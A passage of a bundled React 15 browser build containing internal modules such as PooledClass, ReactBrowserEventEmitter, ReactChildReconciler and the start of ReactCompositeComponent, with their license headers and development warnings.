 _assertValueLink(inputProps);\n      return inputProps.valueLink.requestChange(event.target.value);\n    } else if (inputProps.checkedLink) {\n      _assertCheckedLink(inputProps);\n      return inputProps.checkedLink.requestChange(event.target.checked);\n    } else if (inputProps.onChange) {\n      return inputProps.onChange.call(undefined, event);\n    }\n  }\n};\n\nmodule.exports = LinkedValueUtils;\n},{\"126\":126,\"135\":135,\"152\":152,\"159\":159,\"162\":162,\"73\":73}],25:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\n/**\n * Static poolers. Several custom versions for each potential number of\n * arguments. A completely generic pooler is easy to implement, but would\n * require accessing the `arguments` object. In each of these, `this` refers to\n * the Class itself, not an instance. If any others are needed, simply add them\n * here, or in their own files.\n */\nvar oneArgumentPooler = function (copyFieldsFrom) {\n  var Klass = this;\n  if (Klass.instancePool.length) {\n    var instance = Klass.instancePool.pop();\n    Klass.call(instance, copyFieldsFrom);\n    return instance;\n  } else {\n    return new Klass(copyFieldsFrom);\n  }\n};\n\nvar twoArgumentPooler = function (a1, a2) {\n  var Klass = this;\n  if (Klass.instancePool.length) {\n    var instance = Klass.instancePool.pop();\n    Klass.call(instance, a1, a2);\n    return instance;\n  } else {\n    return new Klass(a1, a2);\n  }\n};\n\nvar threeArgumentPooler = function (a1, a2, a3) {\n  var Klass = this;\n  if (Klass.instancePool.length) {\n    var instance = Klass.instancePool.pop();\n    Klass.call(instance, a1, a2, a3);\n    return instance;\n  } else {\n    return new Klass(a1, a2, a3);\n  }\n};\n\nvar fourArgumentPooler = function (a1, a2, a3, a4) {\n  var Klass = this;\n  if (Klass.instancePool.length) {\n    var instance = Klass.instancePool.pop();\n    Klass.call(instance, a1, a2, a3, a4);\n    return instance;\n  } else {\n    return new Klass(a1, a2, a3, a4);\n  }\n};\n\nvar standardReleaser = function (instance) {\n  var Klass = this;\n  !(instance instanceof Klass) ? \"development\" !== 'production' ? invariant(false, 'Trying to release an instance into a pool of a different type.') : _prodInvariant('25') : void 0;\n  instance.destructor();\n  if (Klass.instancePool.length < Klass.poolSize) {\n    Klass.instancePool.push(instance);\n  }\n};\n\nvar DEFAULT_POOL_SIZE = 10;\nvar DEFAULT_POOLER = oneArgumentPooler;\n\n/**\n * Augments `CopyConstructor` to be a poolable class, augmenting only the class\n * itself (statically) not adding any prototypical fields. Any CopyConstructor\n * you give this may have a `poolSize` property, and will look for a\n * prototypical `destructor` on instances.\n *\n * @param {Function} CopyConstructor Constructor that can be used to reset.\n * @param {Function} pooler Customizable pooler.\n */\nvar addPoolingTo = function (CopyConstructor, pooler) {\n  // Casting as any so that flow ignores the actual implementation and trusts\n  // it to match the type we declared\n  var NewKlass = CopyConstructor;\n  NewKlass.instancePool = [];\n  NewKlass.getPooled = pooler || DEFAULT_POOLER;\n  if (!NewKlass.poolSize) {\n    NewKlass.poolSize = DEFAULT_POOL_SIZE;\n  }\n  NewKlass.release = standardReleaser;\n  return NewKlass;\n};\n\nvar PooledClass = {\n  addPoolingTo: addPoolingTo,\n  oneArgumentPooler: oneArgumentPooler,\n  twoArgumentPooler: twoArgumentPooler,\n  threeArgumentPooler: threeArgumentPooler,\n  fourArgumentPooler: fourArgumentPooler\n};\n\nmodule.exports = PooledClass;\n},{\"126\":126,\"152\":152}],26:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar EventPluginRegistry = _dereq_(18);\nvar ReactEventEmitterMixin = _dereq_(56);\nvar ViewportMetrics = _dereq_(101);\n\nvar getVendorPrefixedEventName = _dereq_(119);\nvar isEventSupported = _dereq_(122);\n\n/**\n * Summary of `ReactBrowserEventEmitter` event handling:\n *\n *  - Top-level delegation is used to trap most native browser events. This\n *    may only occur in the main thread and is the responsibility of\n *    ReactEventListener, which is injected and can therefore support pluggable\n *    event sources. This is the only work that occurs in the main thread.\n *\n *  - We normalize and de-duplicate events to account for browser quirks. This\n *    may be done in the worker thread.\n *\n *  - Forward these native events (with the associated top-level type used to\n *    trap it) to `EventPluginHub`, which in turn will ask plugins if they want\n *    to extract any synthetic events.\n *\n *  - The `EventPluginHub` will then process each event by annotating them with\n *    \"dispatches\", a sequence of listeners and IDs that care about that event.\n *\n *  - The `EventPluginHub` then dispatches the events.\n *\n * Overview of React and the event system:\n *\n * +------------+    .\n * |    DOM     |    .\n * +------------+    .\n *       |           .\n *       v           .\n * +------------+    .\n * | ReactEvent |    .\n * |  Listener  |    .\n * +------------+    .                         +-----------+\n *       |           .               +--------+|SimpleEvent|\n *       |           .               |         |Plugin     |\n * +-----|------+    .               v         +-----------+\n * |     |      |    .    +--------------+                    +------------+\n * |     +-----------.--->|EventPluginHub|                    |    Event   |\n * |            |    .    |              |     +-----------+  | Propagators|\n * | ReactEvent |    .    |              |     |TapEvent   |  |------------|\n * |  Emitter   |    .    |              |<---+|Plugin     |  |other plugin|\n * |            |    .    |              |     +-----------+  |  utilities |\n * |     +-----------.--->|              |                    +------------+\n * |     |      |    .    +--------------+\n * +-----|------+    .                ^        +-----------+\n *       |           .                |        |Enter/Leave|\n *       +           .                +-------+|Plugin     |\n * +-------------+   .                         +-----------+\n * | application |   .\n * |-------------|   .\n * |             |   .\n * |             |   .\n * +-------------+   .\n *                   .\n *    React Core     .  General Purpose Event Plugin System\n */\n\nvar hasEventPageXY;\nvar alreadyListeningTo = {};\nvar isMonitoringScrollValue = false;\nvar reactTopListenersCounter = 0;\n\n// For events like 'submit' which don't consistently bubble (which we trap at a\n// lower node than `document`), binding at `document` would cause duplicate\n// events so we don't include them here\nvar topEventMapping = {\n  topAbort: 'abort',\n  topAnimationEnd: getVendorPrefixedEventName('animationend') || 'animationend',\n  topAnimationIteration: getVendorPrefixedEventName('animationiteration') || 'animationiteration',\n  topAnimationStart: getVendorPrefixedEventName('animationstart') || 'animationstart',\n  topBlur: 'blur',\n  topCanPlay: 'canplay',\n  topCanPlayThrough: 'canplaythrough',\n  topChange: 'change',\n  topClick: 'click',\n  topCompositionEnd: 'compositionend',\n  topCompositionStart: 'compositionstart',\n  topCompositionUpdate: 'compositionupdate',\n  topContextMenu: 'contextmenu',\n  topCopy: 'copy',\n  topCut: 'cut',\n  topDoubleClick: 'dblclick',\n  topDrag: 'drag',\n  topDragEnd: 'dragend',\n  topDragEnter: 'dragenter',\n  topDragExit: 'dragexit',\n  topDragLeave: 'dragleave',\n  topDragOver: 'dragover',\n  topDragStart: 'dragstart',\n  topDrop: 'drop',\n  topDurationChange: 'durationchange',\n  topEmptied: 'emptied',\n  topEncrypted: 'encrypted',\n  topEnded: 'ended',\n  topError: 'error',\n  topFocus: 'focus',\n  topInput: 'input',\n  topKeyDown: 'keydown',\n  topKeyPress: 'keypress',\n  topKeyUp: 'keyup',\n  topLoadedData: 'loadeddata',\n  topLoadedMetadata: 'loadedmetadata',\n  topLoadStart: 'loadstart',\n  topMouseDown: 'mousedown',\n  topMouseMove: 'mousemove',\n  topMouseOut: 'mouseout',\n  topMouseOver: 'mouseover',\n  topMouseUp: 'mouseup',\n  topPaste: 'paste',\n  topPause: 'pause',\n  topPlay: 'play',\n  topPlaying: 'playing',\n  topProgress: 'progress',\n  topRateChange: 'ratechange',\n  topScroll: 'scroll',\n  topSeeked: 'seeked',\n  topSeeking: 'seeking',\n  topSelectionChange: 'selectionchange',\n  topStalled: 'stalled',\n  topSuspend: 'suspend',\n  topTextInput: 'textInput',\n  topTimeUpdate: 'timeupdate',\n  topTouchCancel: 'touchcancel',\n  topTouchEnd: 'touchend',\n  topTouchMove: 'touchmove',\n  topTouchStart: 'touchstart',\n  topTransitionEnd: getVendorPrefixedEventName('transitionend') || 'transitionend',\n  topVolumeChange: 'volumechange',\n  topWaiting: 'waiting',\n  topWheel: 'wheel'\n};\n\n/**\n * To ensure no conflicts with other potential React instances on the page\n */\nvar topListenersIDKey = '_reactListenersID' + String(Math.random()).slice(2);\n\nfunction getListeningForDocument(mountAt) {\n  // In IE8, `mountAt` is a host object and doesn't have `hasOwnProperty`\n  // directly.\n  if (!Object.prototype.hasOwnProperty.call(mountAt, topListenersIDKey)) {\n    mountAt[topListenersIDKey] = reactTopListenersCounter++;\n    alreadyListeningTo[mountAt[topListenersIDKey]] = {};\n  }\n  return alreadyListeningTo[mountAt[topListenersIDKey]];\n}\n\n/**\n * `ReactBrowserEventEmitter` is used to attach top-level event listeners. For\n * example:\n *\n *   EventPluginHub.putListener('myID', 'onClick', myFunction);\n *\n * This would allocate a \"registration\" of `('onClick', myFunction)` on 'myID'.\n *\n * @internal\n */\nvar ReactBrowserEventEmitter = _assign({}, ReactEventEmitterMixin, {\n  /**\n   * Injectable event backend\n   */\n  ReactEventListener: null,\n\n  injection: {\n    /**\n     * @param {object} ReactEventListener\n     */\n    injectReactEventListener: function (ReactEventListener) {\n      ReactEventListener.setHandleTopLevel(ReactBrowserEventEmitter.handleTopLevel);\n      ReactBrowserEventEmitter.ReactEventListener = ReactEventListener;\n    }\n  },\n\n  /**\n   * Sets whether or not any created callbacks should be enabled.\n   *\n   * @param {boolean} enabled True if callbacks should be enabled.\n   */\n  setEnabled: function (enabled) {\n    if (ReactBrowserEventEmitter.ReactEventListener) {\n      ReactBrowserEventEmitter.ReactEventListener.setEnabled(enabled);\n    }\n  },\n\n  /**\n   * @return {boolean} True if callbacks are enabled.\n   */\n  isEnabled: function () {\n    return !!(ReactBrowserEventEmitter.ReactEventListener && ReactBrowserEventEmitter.ReactEventListener.isEnabled());\n  },\n\n  /**\n   * We listen for bubbled touch events on the document object.\n   *\n   * Firefox v8.01 (and possibly others) exhibited strange behavior when\n   * mounting `onmousemove` events at some node that was not the document\n   * element. The symptoms were that if your mouse is not moving over something\n   * contained within that mount point (for example on the background) the\n   * top-level listeners for `onmousemove` won't be called. However, if you\n   * register the `mousemove` on the document object, then it will of course\n   * catch all `mousemove`s. This along with iOS quirks, justifies restricting\n   * top-level listeners to the document object only, at least for these\n   * movement types of events and possibly all events.\n   *\n   * @see http://www.quirksmode.org/blog/archives/2010/09/click_event_del.html\n   *\n   * Also, `keyup`/`keypress`/`keydown` do not bubble to the window on IE, but\n   * they bubble to document.\n   *\n   * @param {string} registrationName Name of listener (e.g. `onClick`).\n   * @param {object} contentDocumentHandle Document which owns the container\n   */\n  listenTo: function (registrationName, contentDocumentHandle) {\n    var mountAt = contentDocumentHandle;\n    var isListening = getListeningForDocument(mountAt);\n    var dependencies = EventPluginRegistry.registrationNameDependencies[registrationName];\n\n    for (var i = 0; i < dependencies.length; i++) {\n      var dependency = dependencies[i];\n      if (!(isListening.hasOwnProperty(dependency) && isListening[dependency])) {\n        if (dependency === 'topWheel') {\n          if (isEventSupported('wheel')) {\n            ReactBrowserEventEmitter.ReactEventListener.trapBubbledEvent('topWheel', 'wheel', mountAt);\n          } else if (isEventSupported('mousewheel')) {\n            ReactBrowserEventEmitter.ReactEventListener.trapBubbledEvent('topWheel', 'mousewheel', mountAt);\n          } else {\n            // Firefox needs to capture a different mouse scroll event.\n            // @see http://www.quirksmode.org/dom/events/tests/scroll.html\n            ReactBrowserEventEmitter.ReactEventListener.trapBubbledEvent('topWheel', 'DOMMouseScroll', mountAt);\n          }\n        } else if (dependency === 'topScroll') {\n          if (isEventSupported('scroll', true)) {\n            ReactBrowserEventEmitter.ReactEventListener.trapCapturedEvent('topScroll', 'scroll', mountAt);\n          } else {\n            ReactBrowserEventEmitter.ReactEventListener.trapBubbledEvent('topScroll', 'scroll', ReactBrowserEventEmitter.ReactEventListener.WINDOW_HANDLE);\n          }\n        } else if (dependency === 'topFocus' || dependency === 'topBlur') {\n          if (isEventSupported('focus', true)) {\n            ReactBrowserEventEmitter.ReactEventListener.trapCapturedEvent('topFocus', 'focus', mountAt);\n            ReactBrowserEventEmitter.ReactEventListener.trapCapturedEvent('topBlur', 'blur', mountAt);\n          } else if (isEventSupported('focusin')) {\n            // IE has `focusin` and `focusout` events which bubble.\n            // @see http://www.quirksmode.org/blog/archives/2008/04/delegating_the.html\n            ReactBrowserEventEmitter.ReactEventListener.trapBubbledEvent('topFocus', 'focusin', mountAt);\n            ReactBrowserEventEmitter.ReactEventListener.trapBubbledEvent('topBlur', 'focusout', mountAt);\n          }\n\n          // to make sure blur and focus event listeners are only attached once\n          isListening.topBlur = true;\n          isListening.topFocus = true;\n        } else if (topEventMapping.hasOwnProperty(dependency)) {\n          ReactBrowserEventEmitter.ReactEventListener.trapBubbledEvent(dependency, topEventMapping[dependency], mountAt);\n        }\n\n        isListening[dependency] = true;\n      }\n    }\n  },\n\n  trapBubbledEvent: function (topLevelType, handlerBaseName, handle) {\n    return ReactBrowserEventEmitter.ReactEventListener.trapBubbledEvent(topLevelType, handlerBaseName, handle);\n  },\n\n  trapCapturedEvent: function (topLevelType, handlerBaseName, handle) {\n    return ReactBrowserEventEmitter.ReactEventListener.trapCapturedEvent(topLevelType, handlerBaseName, handle);\n  },\n\n  /**\n   * Protect against document.createEvent() returning null\n   * Some popup blocker extensions appear to do this:\n   * https://github.com/facebook/react/issues/6887\n   */\n  supportsEventPageXY: function () {\n    if (!document.createEvent) {\n      return false;\n    }\n    var ev = document.createEvent('MouseEvent');\n    return ev != null && 'pageX' in ev;\n  },\n\n  /**\n   * Listens to window scroll and resize events. We cache scroll values so that\n   * application code can access them without triggering reflows.\n   *\n   * ViewportMetrics is only used by SyntheticMouse/TouchEvent and only when\n   * pageX/pageY isn't supported (legacy browsers).\n   *\n   * NOTE: Scroll events do not bubble.\n   *\n   * @see http://www.quirksmode.org/dom/events/scroll.html\n   */\n  ensureScrollValueMonitoring: function () {\n    if (hasEventPageXY === undefined) {\n      hasEventPageXY = ReactBrowserEventEmitter.supportsEventPageXY();\n    }\n    if (!hasEventPageXY && !isMonitoringScrollValue) {\n      var refresh = ViewportMetrics.refreshScrollValues;\n      ReactBrowserEventEmitter.ReactEventListener.monitorScrollValue(refresh);\n      isMonitoringScrollValue = true;\n    }\n  }\n});\n\nmodule.exports = ReactBrowserEventEmitter;\n},{\"101\":101,\"119\":119,\"122\":122,\"160\":160,\"18\":18,\"56\":56}],27:[function(_dereq_,module,exports){\n(function (process){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactReconciler = _dereq_(75);\n\nvar instantiateReactComponent = _dereq_(121);\nvar KeyEscapeUtils = _dereq_(23);\nvar shouldUpdateReactComponent = _dereq_(130);\nvar traverseAllChildren = _dereq_(131);\nvar warning = _dereq_(159);\n\nvar ReactComponentTreeHook;\n\nif (typeof process !== 'undefined' && process.env && \"development\" === 'test') {\n  // Temporary hack.\n  // Inline requires don't work well with Jest:\n  // https://github.com/facebook/react/issues/7240\n  // Remove the inline requires when we don't need them anymore:\n  // https://github.com/facebook/react/pull/7178\n  ReactComponentTreeHook = _dereq_(133);\n}\n\nfunction instantiateChild(childInstances, child, name, selfDebugID) {\n  // We found a component instance.\n  var keyUnique = childInstances[name] === undefined;\n  if (\"development\" !== 'production') {\n    if (!ReactComponentTreeHook) {\n      ReactComponentTreeHook = _dereq_(133);\n    }\n    if (!keyUnique) {\n      \"development\" !== 'production' ? warning(false, 'flattenChildren(...): Encountered two children with the same key, ' + '`%s`. Child keys must be unique; when two children share a key, only ' + 'the first child will be used.%s', KeyEscapeUtils.unescape(name), ReactComponentTreeHook.getStackAddendumByID(selfDebugID)) : void 0;\n    }\n  }\n  if (child != null && keyUnique) {\n    childInstances[name] = instantiateReactComponent(child, true);\n  }\n}\n\n/**\n * ReactChildReconciler provides helpers for initializing or updating a set of\n * children. Its output is suitable for passing it onto ReactMultiChild which\n * does diffed reordering and insertion.\n */\nvar ReactChildReconciler = {\n  /**\n   * Generates a \"mount image\" for each of the supplied children. In the case\n   * of `ReactDOMComponent`, a mount image is a string of markup.\n   *\n   * @param {?object} nestedChildNodes Nested child maps.\n   * @return {?object} A set of child instances.\n   * @internal\n   */\n  instantiateChildren: function (nestedChildNodes, transaction, context, selfDebugID) // 0 in production and for roots\n  {\n    if (nestedChildNodes == null) {\n      return null;\n    }\n    var childInstances = {};\n\n    if (\"development\" !== 'production') {\n      traverseAllChildren(nestedChildNodes, function (childInsts, child, name) {\n        return instantiateChild(childInsts, child, name, selfDebugID);\n      }, childInstances);\n    } else {\n      traverseAllChildren(nestedChildNodes, instantiateChild, childInstances);\n    }\n    return childInstances;\n  },\n\n  /**\n   * Updates the rendered children and returns a new set of children.\n   *\n   * @param {?object} prevChildren Previously initialized set of children.\n   * @param {?object} nextChildren Flat child element maps.\n   * @param {ReactReconcileTransaction} transaction\n   * @param {object} context\n   * @return {?object} A new set of child instances.\n   * @internal\n   */\n  updateChildren: function (prevChildren, nextChildren, mountImages, removedNodes, transaction, hostParent, hostContainerInfo, context, selfDebugID) // 0 in production and for roots\n  {\n    // We currently don't have a way to track moves here but if we use iterators\n    // instead of for..in we can zip the iterators and check if an item has\n    // moved.\n    // TODO: If nothing has changed, return the prevChildren object so that we\n    // can quickly bailout if nothing has changed.\n    if (!nextChildren && !prevChildren) {\n      return;\n    }\n    var name;\n    var prevChild;\n    for (name in nextChildren) {\n      if (!nextChildren.hasOwnProperty(name)) {\n        continue;\n      }\n      prevChild = prevChildren && prevChildren[name];\n      var prevElement = prevChild && prevChild._currentElement;\n      var nextElement = nextChildren[name];\n      if (prevChild != null && shouldUpdateReactComponent(prevElement, nextElement)) {\n        ReactReconciler.receiveComponent(prevChild, nextElement, transaction, context);\n        nextChildren[name] = prevChild;\n      } else {\n        if (prevChild) {\n          removedNodes[name] = ReactReconciler.getHostNode(prevChild);\n          ReactReconciler.unmountComponent(prevChild, false);\n        }\n        // The child must be instantiated before it's mounted.\n        var nextChildInstance = instantiateReactComponent(nextElement, true);\n        nextChildren[name] = nextChildInstance;\n        // Creating mount image now ensures refs are resolved in right order\n        // (see https://github.com/facebook/react/pull/7101 for explanation).\n        var nextChildMountImage = ReactReconciler.mountComponent(nextChildInstance, transaction, hostParent, hostContainerInfo, context, selfDebugID);\n        mountImages.push(nextChildMountImage);\n      }\n    }\n    // Unmount children that are no longer present.\n    for (name in prevChildren) {\n      if (prevChildren.hasOwnProperty(name) && !(nextChildren && nextChildren.hasOwnProperty(name))) {\n        prevChild = prevChildren[name];\n        removedNodes[name] = ReactReconciler.getHostNode(prevChild);\n        ReactReconciler.unmountComponent(prevChild, false);\n      }\n    }\n  },\n\n  /**\n   * Unmounts all rendered children. This should be used to clean up children\n   * when this component is unmounted.\n   *\n   * @param {?object} renderedChildren Previously initialized set of children.\n   * @internal\n   */\n  unmountChildren: function (renderedChildren, safely) {\n    for (var name in renderedChildren) {\n      if (renderedChildren.hasOwnProperty(name)) {\n        var renderedChild = renderedChildren[name];\n        ReactReconciler.unmountComponent(renderedChild, safely);\n      }\n    }\n  }\n};\n\nmodule.exports = ReactChildReconciler;\n}).call(this,undefined)\n},{\"121\":121,\"130\":130,\"131\":131,\"133\":133,\"159\":159,\"23\":23,\"75\":75}],28:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMChildrenOperations = _dereq_(8);\nvar ReactDOMIDOperations = _dereq_(38);\n\n/**\n * Abstracts away all functionality of the reconciler that requires knowledge of\n * the browser context. TODO: These callers should be refactored to avoid the\n * need for this injection.\n */\nvar ReactComponentBrowserEnvironment = {\n  processChildrenUpdates: ReactDOMIDOperations.dangerouslyProcessChildrenUpdates,\n\n  replaceNodeWithMarkup: DOMChildrenOperations.dangerouslyReplaceNodeWithMarkup\n};\n\nmodule.exports = ReactComponentBrowserEnvironment;\n},{\"38\":38,\"8\":8}],29:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\nvar injected = false;\n\nvar ReactComponentEnvironment = {\n  /**\n   * Optionally injectable hook for swapping out mount images in the middle of\n   * the tree.\n   */\n  replaceNodeWithMarkup: null,\n\n  /**\n   * Optionally injectable hook for processing a queue of child updates. Will\n   * later move into MultiChildComponents.\n   */\n  processChildrenUpdates: null,\n\n  injection: {\n    injectEnvironment: function (environment) {\n      !!injected ? \"development\" !== 'production' ? invariant(false, 'ReactCompositeComponent: injectEnvironment() can only be called once.') : _prodInvariant('104') : void 0;\n      ReactComponentEnvironment.replaceNodeWithMarkup = environment.replaceNodeWithMarkup;\n      ReactComponentEnvironment.processChildrenUpdates = environment.processChildrenUpdates;\n      injected = true;\n    }\n  }\n};\n\nmodule.exports = ReactComponentEnvironment;\n},{\"126\":126,\"152\":152}],30:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nvar React = _dereq_(135);\nvar ReactComponentEnvironment = _dereq_(29);\nvar ReactCurrentOwner = _dereq_(134);\nvar ReactErrorUtils = _dereq_(55);\nvar ReactInstanceMap = _dereq_(63);\nvar ReactInstrumentation = _dereq_(64);\nvar ReactNodeTypes = _dereq_(69);\nvar ReactReconciler = _dereq_(75);\n\nif (\"development\" !== 'production') {\n  var checkReactTypeSpec = _dereq_(104);\n}\n\nvar emptyObject = _dereq_(145);\nvar invariant = _dereq_(152);\nvar shallowEqual = _dereq_(158);\nvar shouldUpdateReactComponent = _dereq_(130);\nvar warning = _dereq_(159);\n\nvar CompositeTypes = {\n  ImpureClass: 0,\n  PureClass: 1,\n  StatelessFunctional: 2\n};\n\nfunction StatelessComponent(Component) {}\nStatelessComponent.prototype.render = function () {\n  var Component = ReactInstanceMap.get(this)._currentElement.type;\n  var element = Component(this.props, this.context, this.updater);\n  warnIfInvalidElement(Component, element);\n  return element;\n};\n\nfunction warnIfInvalidElement(Component, element) {\n  if (\"development\" !== 'production') {\n    \"development\" !== 'production' ? warning(element === null || element === false || React.isValidElement(element), '%s(...): A valid React element (or null) must be returned. You may have ' + 'returned undefined, an array or some other invalid object.', Component.displayName || Component.name || 'Component') : void 0;\n    \"development\" !== 'production' ? warning(!Component.childContextTypes, '%s(...): childContextTypes cannot be defined on a functional component.', Component.displayName || Component.name || 'Component') : void 0;\n  }\n}\n\nfunction shouldConstruct(Component) {\n  return !!(Component.prototype && Component.prototype.isReactComponent);\n}\n\nfunction isPureComponent(Component) {\n  return !!(Component.prototype && Component.prototype.isPureReactComponent);\n}\n\n// Separated into a function to contain deoptimizations caused by try/finally.\nfunction measureLifeCyclePerf(fn, debugID, timerType) {\n  if (debugID === 0) {\n    // Top-level wrappers (see ReactMount) and empty components (see\n    // ReactDOMEmptyComponent) are invisible to hooks and devtools.\n    // Both are implementation details that should go away in the future.\n    return fn();\n  }\n\n  ReactInstrumentation.debugTool.onBeginLifeCycleTimer(debugID, timerType);\n  try {\n    return fn();\n  } finally {\n    ReactInstrumentation.debugTool.onEndLifeCycleTimer(debugID, timerType);\n  }\n}\n\n/**\n * ------------------ The Life-Cycle of a Composite Component ------------------\n *\n * - constructor: Initialization of state. The instance is now retained.\n *   - componentWillMount\n *   - render\n *   - [children's constructors]\n *     - [children's componentWillMount and render]\n *     - [children's componentDidMount]\n *     - componentDidMount\n *\n *       Update Phases:\n *       - componentWillReceiveProps (only called if parent updated)\n *       - shouldComponentUpdate\n *         - componentWillUpdate\n *           - render\n *           - [children's constructors or receive props phases]\n *         - componentDidUpdate\n *\n *     - componentWillUnmount\n *     - [children's componentWillUnmount]\n *   - [children destroyed]\n * - (destroyed): The instance is now blank, released by React and ready for GC.\n *\n * -----------------------------------------------------------------------------\n */\n\n/**\n * An incrementing ID assigned to each component when it is mounted. This is\n * used to enforce the order in which `ReactUpdates` updates dirty components.\n *\n * @private\n */\nvar nextMountID = 1;\n\n/**\n * @lends {ReactCompositeComponent.prototype}\n */\nvar ReactCompositeComponent = {\n  /**\n   * Base constructor for all composite component.\n   *\n   * @param {ReactElement} element\n   * @final\n   * @internal\n   */\n  construct: function (element) {\n    this._currentElement = element;\n    this._rootNodeID = 0;\n    this._compositeType = null;\n    this._instance = null;\n    this._hostParent = null;\n    this._hostContainerInfo = null;\n\n    // See ReactUpdateQueue\n    this._updateBatchNumber = null;\n    this._pendingElement = null;\n    this._pendingStateQueue = null;\n    this._pendingReplaceState = false;\n    this._pendingForceUpdate = false;\n\n    this._renderedNodeType = null;\n    this._renderedComponent = null;\n    this._context = null;\n    this._mountOrder = 0;\n    this._topLevelWrapper = null;\n\n    // See ReactUpdates and ReactUpdateQueue.\n    this._pendingCallbacks = null;\n\n    // ComponentWillUnmount shall only be called once\n    this._calledComponentWillUnmount = false;\n\n    if (\"development\" !== 'production') {\n      this._warnedAboutRefsInRender = false;\n    }\n  },\n\n  /**\n   * Initializes the component, renders markup, and registers event listeners.\n   *\n   * @param {ReactReconcileTransaction|ReactServerRenderingTransaction} transaction\n   * @param {?object} hostParent\n   * @param {?object} hostContainerInfo\n   * @param {?object} context\n   * @return {?string} Rendered markup to be inserted into the DOM.\n   * @final\n   * @internal\n   */\n  mountComponent: function (transaction, hostParent, hostContainerInfo, context) {\n    var _this = this;\n\n    this._context = context;\n    this._mountOrder = nextMountID++;\n    this._hostParent = hostParent;\n    this._hostContainerInfo = hostContainerInfo;\n\n    var publicProps = this._currentElement.props;\n    var publicContext = this._processContext(context);\n\n    var Component = this._currentElement.type;\n\n    var updateQueue = transaction.getUpdateQueue();\n\n    // Initialize the public class\n    var doConstruct = shouldConstruct(Component);\n    var inst = this._constructComponent(doConstruct, publicProps, publicContext, updateQueue);\n    var renderedElement;\n\n    // Support functional components\n    if (!doConstruct && (inst == null || inst.render == null)) {\n      renderedElement = inst;\n      warnIfInvalidElement(Component, renderedElement);\n      !(inst === null || inst === false || React.isValidElement(inst)) ? \"development\" !== 'production' ? invariant(false, '%s(...): A valid React element (or null) must be returned. You may have returned undefined, an array or some other invalid object.', Component.displayName || Component.name || 'Component') : _prodInvariant('105', Component.displayName || Component.name || 'Component') : void 0;\n      inst = new StatelessComponent(Component);\n      this._compositeType = CompositeTypes.StatelessFunctional;\n    } else {\n      if (isPureComponent(Component)) {\n        this._compositeType = CompositeTypes.PureClass;\n      } else {\n        this._compositeType = CompositeTypes.ImpureClass;\n      }\n    }\n\n    if (\"development\" !== 'production') {\n      // This will throw later in _renderValidatedComponent, but add an early\n      // warning now to help debugging\n      if (inst.render == null) {\n        \"development\" !== 'production' ? warning(false, '%s(...): No `render` method found on the returned component ' + 'instance: you may have forgotten to define `render`.', Component.displayName || Component.name || 'Component') : void 0;\n      }\n\n      var propsMutated = inst.props !== publicProps;\n      var componentName = Component.displayName || Component.name || 'Component';\n\n      \"development\" !== 'production' ? warning(inst.props === undefined || !propsMutated, '%s(...): When calling super() in `%s`, make sure to pass ' + \"up the same props that your component's constructor was passed.\", componentName, componentName) : void 0;\n    }\n\n    // These should be set up in the constructor, but as a convenience for\n    // simpler class abstractions, we set them up after the fact.\n    inst.props = publicProps;\n    inst.context = publicContext;\n    inst.refs = emptyObject;\n    inst.updater = updateQueue;\n\n    this._instance = inst;\n\n    // Store a reference from the instance back to the internal representation\n    ReactInstanceMap.set(inst, this);\n\n    if (\"development\" !== 'production') {\n      // Since plain JS classes are defined without any special initialization\n      // logic, we can not catch common errors early. Therefore, we have to\n      // catch them here, at initialization time, instead.\n      \"development\" !== 'production' ? warning(!inst.getInitialState || inst.getInitialState.isReactClassApproved || inst.state, 'getInitialState was defined on %s, a plain JavaScript class. ' + 'This is only supported for classes created using React.createClass. ' + 'Did you mean to define a state property instead?', this.getName() || 'a component') : void 0;\n      \"development\" !== 'production' ? warning(!inst.getDefaultProps || inst.getDefaultProps.isReactClassApproved, 'getDefaultProps was defined on %s, a plain JavaScript class. ' + 'This is only supported for classes created using React.createClass. ' + 'Use a static property to define defaultProps instead.', this.getName() || 'a component') : void 0;\n      \"development\" !== 'production' ? warning(!inst.propTypes, 'propTypes was defined as an instance property on %s. Use a static ' + 'property to define propTypes instead.', this.getName() || 'a component') : void 0;\n      \"development\" !== 'production' ? warning(!inst.contextTypes, 'contextTypes was defined as an instance property on %s. Use a ' + 'static property to define contextTypes instead.', this.getName() || 'a component') : void 0;\n      \"development\" !== 'production' ? warning(typeof inst.componentShouldUpdate !== 'function', '%s has a method called ' + 'componentShouldUpdate(). Did you mean shouldComponentUpdate()? ' + 'The name is phrased as a question because the function is ' + 'expected to return a value.', this.getName() || 'A component') : void 0;\n      \"development\" !== 'production' ? warning(typeof inst.componentDidUnmount !== 'function', '%s has a method called ' + 'componentDidUnmount(). But there is no such lifecycle method. ' + 'Did you mean 